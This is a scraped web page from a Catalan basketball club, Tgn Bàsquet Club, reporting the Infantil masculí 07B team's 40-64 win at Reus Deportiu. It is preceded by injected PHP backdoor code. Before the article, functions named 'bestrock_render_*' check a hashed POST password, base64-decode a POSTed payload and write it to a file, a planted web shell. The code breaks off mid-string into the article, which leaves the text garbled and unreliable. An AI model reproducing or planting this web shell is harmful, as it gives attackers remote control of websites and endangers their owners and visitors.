function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Infantil masculí 07B aconsegueix la seva primera victòria a la pista del Reus Deportiu (40-64) - Tgn Bàsquet Club -

Infantil masculí 07B aconsegueix la seva primera victòria a la pista del Reus Deportiu (40-64)

Updated: maig 12, 2021

Els de l’Infantil 07B sumen el primer triomf en el seu tercer partit de la temporada, disputat al Reus Deportiu. La superioritat física dels tarragonins es va fer notar des del minut u. Es van imposar sobretot en el rebot, generant segones oportunitats en atac, encara que no les van saber aprofitar fins a la segona part del matx. Les ràpides transicions ofensives van donar un clar avantatge als liles que, a falta de 5 minuts per finalitzar el matx, deixen al marcador un determinant 33-60. Els reusencs van lluitar fins als últims segons del partit acabant amb un parcial favorable de 7-4, maquillant així el marcador final.